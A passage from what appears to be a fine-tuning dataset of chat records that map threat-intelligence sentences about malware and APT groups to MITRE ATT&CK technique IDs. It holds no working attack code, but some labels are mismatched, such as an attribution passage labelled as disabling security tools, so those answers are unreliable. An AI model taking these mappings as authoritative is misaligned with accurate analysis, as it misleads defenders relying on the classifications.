- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A recent lull in the distribution of spam spreading information-stealing malware via the Hancitor downloader has been snapped"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan used ssh for internal reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has compromised email accounts to conduct social engineering attacks."
- },
- {
- "role": "assistant",
- "content": "T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emissary has the capability to create a remote shell and execute specified commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper used shellcode with an XOR algorithm to decrypt a payload. Tropic Trooper also decrypted image files which contained a payload."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one instance, menuPass added PlugX as a service with a display name of \"Corel Writing Tools Utility.\""
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The headers are XOR encrypted with and combined and reversed"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From an infrastructure point of view there is no overlap between the two sets of activity, the only overlap is the use of the unique tool “DNSMessenger” When these points are considered together in conjunction with the significant difference in targeting they make a strong case for classifying this activity as distinct from FIN7 activity"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has compromised email accounts to send spearphishing e-mails."
- },
- {
- "role": "assistant",
- "content": "T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1021.004 - Remote Services: SSH', 'T1018 - Remote System Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has modified and added entries within \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.012 - Event Triggered Execution: Image File Execution Options Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By using this technique, the malware is able to leverage itself from a signed and verified legitimate Windows OS process, or, alternatively, if aswrundll.exe or unins000.exe exists, a signed and verified security product process"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can collect the IP address of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has the ability to bypass UAC to deploy post exploitation tools with elevated privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Let's use the example data 8,54351-1616479009,0 from a beacon sent from the payload to the C2, which it will encode using base64 to OCw1NDM1MS0xNjE2NDc5MDA5LDA=, append the @ symbol and embed within a BMP image. The 8-bits of this base2 representation are then used to set specific bits within the 3-bytes for each pixel"
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet propagates to available network shares."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 has used various forms of spearphishing in attempts to get users to open links."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used for credential dumping, as well as Metasploit’s NTDSGRAB module to obtain a copy of the victim's Active Directory database."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence in the Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used DLL search order hijacking."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used an information gathering module that will hide an AV software window from the victim."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decoding the PDF and AppleSeed payload, the content gets written into the ProgramData directory. At the end, the decoy PDF file is opened by calling Wscript.Shell.Run and the AppleSeed payload executed through PowerShell by calling regsvr32.exe. Calling regsvr32.exe to run a DLL registers it as a server that automatically calls the DLL export function that has been named DllRegisterServer"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Impacket contains various modules emulating other service execution tools such as PsExec."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has undergone regular technical improvements in an attempt to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER can use DNS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has used \"whoami\" commands to identify system owners."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MiniDuke can gather the hostname on a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has the ability to capture RDP credentials by capturing the \"CredEnumerateA\" API"
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can check for existing stratum cryptomining information in \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\spreadCpuXmr – %stratum info%\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An HTTP malware variant used Base64 to encode communications to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EnvyScout can use hidden directories and files to hide malicious executables."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TINYTYPHON installs itself under Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the Trojan receives this echo, it will create the following file that the Trojan uses as a signal that it was able to successfully communicate with its C2 server: %APPDATA%\\Windows\\ShwDoc.srv If the Trojan determines the C2 server wishes to send a command, it sends an HTTP request to the following URL: hxxp://www.windowspatch[.]com/tahw? The Trojan will first check the response to this request for the string spoo, which signifies the C2 does not wish to issue a command"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of performing directory listings."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "T9000 searches through connected drives for removable storage devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem can Base64 encode data sent to C2."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password: Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs: On the left, we have the ROKRAT sample and on the right the FreeMilk sample"
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors split some archived exfiltration files into chunks smaller than 1MB."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has checked for the existence of Kaspersky antivirus software on the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon lists the directories for Desktop, program files, and the user’s recently accessed files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis has the ability to search for files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the \"Paths\" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1124 - System Time Discovery', 'T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed dropping password grabber modules including Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One variant of BlackEnergy creates a new service using either a hard-coded or randomly generated name."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker runs the MimiKatz tool and launches a DCShadow attack (lsadump::dcshadow)"
- },
- {
- "role": "assistant",
- "content": "T1207 - Rogue Domain Controller"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINERACK can gather information about the host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransomware can also get into the system through certain vulnerability exploits.. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379)."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution', 'T1588.006 - Vulnerabilities', 'T1587.004 - Exploits', 'T1499.004 - Application or System Exploitation', 'T1190 - Exploit Public-Facing Application', 'T1210 - Exploitation of Remote Services', 'T1588.005 - Exploits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Dust Storm, the threat actors used UPX to pack some payloads."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file. The group notably abuses Excel 4.0 macro — a particularly old macro likely used to evade typical macro detection"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "and then deletes the original launcher"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "down_new has the ability to list running processes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has presented the user with a UAC prompt to elevate privileges while installing."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to execute shell commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We are still analyzing this Trojan to determine the specific structure of the data sent between the Trojan and the C2 server; however, it does appear that the Trojan is using the RC4 algorithm to encrypt data sent to the C2 server within HTTP POST requests"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY encrypts C2 traffic with AES and RSA."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zox has the ability to use SMB for communication."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used steganography to hide C2 communications in images."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Molerats used various implants, including those built on .NET, on target machines."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
